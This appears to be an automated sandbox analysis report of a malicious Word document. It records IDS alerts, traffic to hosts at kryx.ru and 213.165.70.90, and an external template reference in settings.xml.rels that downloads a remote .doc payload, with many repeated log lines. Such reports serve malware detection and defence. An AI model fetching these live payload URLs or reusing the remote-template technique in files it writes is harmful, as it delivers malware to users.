Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 188.225.72.170:443 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 188.225.72.170:443 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 188.225.72.170:443 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 188.225.72.170:443 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 188.225.72.170:443 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 188.225.72.170:443 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 188.225.72.170:443 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 188.225.72.170:443 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 188.225.72.170:443 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49686
Source: global traffic	TCP traffic: 192.168.2.7:49686 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 192.168.2.7:49686 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49686
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 1810005 - Severity 1 - Joe Security ANOMALY Microsoft Office WebDAV Discovery : 192.168.2.7:49684 -> 188.225.72.170:443

Source: Joe Sandbox View

ASN Name: TIMEWEB-ASRU TIMEWEB-ASRU

Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49685 -> 188.225.72.170:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49683 -> 188.225.72.170:443

Source: global traffic	HTTP traffic detected: GET /8IJcFB?&bangladesh=abstracted&change HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: kryx.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /346/fusce/givenbestresultswithglorryeyeshappiness________givenbestresultswithglorryeyeshappiness_________givenbestresultswithglorryeyeshappiness.doc?&explanation=puffy&bestseller HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateConnection: Keep-AliveHost: 213.165.70.90

Source: unknown	TCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknown	TCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknown	TCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknown	TCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknown	TCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknown	TCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknown	TCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknown	TCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknown	TCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknown	TCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknown	TCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknown	TCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknown	TCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknown	TCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknown	TCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknown	TCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknown	TCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknown	TCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknown	TCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknown	TCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknown	TCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknown	TCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknown	TCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknown	TCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknown	TCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknown	TCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknown	TCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknown	TCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknown	TCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknown	TCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknown	TCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknown	TCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknown	TCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknown	TCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknown	TCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknown	TCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknown	TCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknown	TCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknown	TCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknown	TCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknown	TCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknown	TCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknown	TCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknown	TCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknown	TCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknown	TCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknown	TCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknown	TCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknown	TCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknown	TCP traffic detected without corresponding DNS query: 213.165.70.90

Source: global traffic	HTTP traffic detected: GET /8IJcFB?&bangladesh=abstracted&change HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: kryx.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /346/fusce/givenbestresultswithglorryeyeshappiness________givenbestresultswithglorryeyeshappiness_________givenbestresultswithglorryeyeshappiness.doc?&explanation=puffy&bestseller HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateConnection: Keep-AliveHost: 213.165.70.90

Source: global traffic

DNS traffic detected: DNS query: kryx.ru

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49687
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49685
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49684
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49683
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49692
Source: unknown	Network traffic detected: HTTP traffic on port 49692 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49685 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49683 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49684 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49687 -> 443

Source: unknown	HTTPS traffic detected: 188.225.72.170:443 -> 192.168.2.7:49683 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.225.72.170:443 -> 192.168.2.7:49684 version: TLS 1.2

Source: classification engine

Classification label: mal60.evad.winDOC@2/1@1/2

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File created: C:\Users\user\Desktop\~$_______03M4138.docx.bin.doc

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File created: C:\Users\user~1\AppData\Local\Temp\{F5C16924-A4AD-4635-8329-48768C988C5C} - OProcSessId.dat

Jump to behavior

Source: _________03M4138.docx.bin.doc

OLE indicator, Word Document stream: true

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: _________03M4138.docx.bin.doc

Virustotal: Detection: 9%

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process created: unknown unknown			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: _________03M4138.docx.bin.doc	Initial sample: OLE zip file path = word/_rels/header2.xml.rels
Source: _________03M4138.docx.bin.doc	Initial sample: OLE zip file path = word/_rels/settings.xml.rels

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll

Jump to behavior

Source: _________03M4138.docx.bin.doc

Initial sample: OLE indicators vbamacros = False

Persistence and Installation Behavior

Contains an external reference to another file

Source: settings.xml.rels

Extracted files from sample: https://kryx.ru/8ijcfb?&bangladesh=abstracted&change

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
